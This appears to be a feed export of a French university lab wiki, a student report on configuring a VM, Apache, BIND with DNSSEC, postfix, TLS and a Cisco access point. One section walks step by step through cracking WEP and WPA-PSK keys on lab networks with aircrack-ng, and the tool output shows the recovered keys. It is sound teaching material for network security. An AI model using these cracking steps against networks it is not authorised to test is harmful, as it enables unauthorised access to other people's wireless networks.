   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
===Installation boite mail===&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
===Générer une demande de certificat en SHA 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signez les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé ==&lt;br /&gt;
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau&lt;br /&gt;
=== Cassage de clé WEP ===&lt;br /&gt;
Commençons par detecter notre interface wifi par le biais d'un&lt;br /&gt;
&amp;lt;pre&amp;gt;ifconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
ou&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par &lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande permet de mettre en mode moniteur notre interface wifi&lt;br /&gt;
Si tout se passe correctement, vous allez voir apparaitre&lt;br /&gt;
&amp;lt;pre&amp;gt;creation du mon0&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan2		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous observons bien que le mode moniteur est activé pour notre wlan2.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons observer tous les réseaux grâce à la commande &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng wlan2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons repéré  la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng  wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-c permet de le selectrionner le channel de communication&lt;br /&gt;
-w le nom du fichier dans lequel airodump va enregistrer les données&lt;br /&gt;
--bssid permet d'indiquer l'adresse mac de la cible &lt;br /&gt;
--essid permet d'indique le ssid de la cible (nom du réseau)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  8 ][ Elapsed: 1 min ][ 2016-11-21 15:08                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  -41  45      799    53316  506   8  54e. WEP  WEP         cracotte03                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -28   54e-54e   222    60221&amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
On peut visualiser le nombre de paquets qui transit. &lt;br /&gt;
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2&lt;br /&gt;
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)&lt;br /&gt;
15:00:01  Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8&lt;br /&gt;
&lt;br /&gt;
15:00:01  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:03  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:05  Sending Authentication Request (Open System) [ACK]&lt;br /&gt;
15:00:05  Authentication successful&lt;br /&gt;
15:00:05  Sending Association Request [ACK]&lt;br /&gt;
15:00:05  Association successful :-) (AID: 1) &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aircrack-ng crack.cap &lt;br /&gt;
                                                            Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                            [00:00:39] Tested 257766 keys (got 32866 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) &lt;br /&gt;
    1    0/  1   EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) &lt;br /&gt;
    2    0/  1   EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) &lt;br /&gt;
    3    0/  1   EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) &lt;br /&gt;
    4    0/  1   EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) &lt;br /&gt;
    5    1/  2   EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) &lt;br /&gt;
    6    0/  1   EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) &lt;br /&gt;
    7    0/  1   EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) &lt;br /&gt;
    8    0/  1   EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) &lt;br /&gt;
    9    0/  1   EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) &lt;br /&gt;
   10    3/  1   62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) &lt;br /&gt;
   11    5/  1   68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) &lt;br /&gt;
   12    0/  2   79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clé WPA-PSK ===&lt;br /&gt;
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. &lt;br /&gt;
Nous utilisons pour commencer&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F&amp;lt;/pre&amp;gt;&lt;br /&gt;
--encrypt permet de sélectionner le type d'encryption souhaité.&lt;br /&gt;
&amp;lt;pre&amp;gt; CH  6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  -34 100      738     1323   26   6  54e  WPA2 CCMP   PSK  Poneyus                                                &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  74:29:AF:F3:FD:91  -16    1e- 1     75      265                                                                   &lt;br /&gt;
 30:5A:3A:15:F6:3F  04:DB:56:3D:FD:A2  -40    0e- 0e  4709     1367 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option &amp;lt;i&amp;gt;handshake&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et nous pouvons utiliser la commande&lt;br /&gt;
&amp;lt;pre&amp;gt; aircrack-ng Poney.cap dico.txt&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt &lt;br /&gt;
Et au bout d'une heure nous parvenons à retrouver la clé WPA .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:16] 2857196 keys tested (792.44 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 02857193 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 &lt;br /&gt;
                       D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 &lt;br /&gt;
                       C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 &lt;br /&gt;
                       21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 &lt;br /&gt;
                       22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 &amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35653</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35653"/>
				<updated>2016-12-06T10:55:25Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
On vient dans un premier temps brancher le point d'accés Cisco et à l'aide de la commande ci dessous, on trouve sur quelle port USB se trouve notre point d'accés&lt;br /&gt;
&amp;lt;pre&amp;gt;dmesg | grep tty&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour configurer notre Cisco, on utilise &amp;lt;i&amp;gt;minicom -os&amp;lt;/i&amp;gt; et pour cela nous devons être en root&lt;br /&gt;
&lt;br /&gt;
Une fois minicom lancé, on vient changer les paramètre de notre Cisco&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;A - Serial Device           : /dev/ttyUSB0&lt;br /&gt;
B - Lockfile Location       : /var/lock &lt;br /&gt;
C - Callin Program          :&lt;br /&gt;
D - Callout Program         :&lt;br /&gt;
E - Bps/Par/Bits            : 9600 8N1&lt;br /&gt;
F - Hardware Flow Control   : No&lt;br /&gt;
G - Software Flow Control   : No&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
On se connecte en admin sur le Cisco &lt;br /&gt;
&amp;lt;Pre&amp;gt;enable&lt;br /&gt;
config terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID&lt;br /&gt;
&amp;lt;pre&amp;gt;dot11 ssid MAMENE&lt;br /&gt;
authentication open&lt;br /&gt;
guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuraiton de l'interface Dot11Radio0&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key&lt;br /&gt;
encryption mode wep mandatory&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accés a notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accés de notre point d'accés&lt;br /&gt;
&amp;lt;pre&amp;gt;access-list 701 permit 5cb9.0180.a039   0000.0000.0000&lt;br /&gt;
access-list 701 permit 3ca8.2a7a.05c5   0000.0000.0000&lt;br /&gt;
access-list 701 permit 7429.aff3.fd91   0000.0000.0000&lt;br /&gt;
access-list 701 permit 5cb9.0180.a139   0000.0000.0000&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
=== Installation du serveur HTTP ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Installation du serveur DNS ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
===Configuration de notre nom de domaine===&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
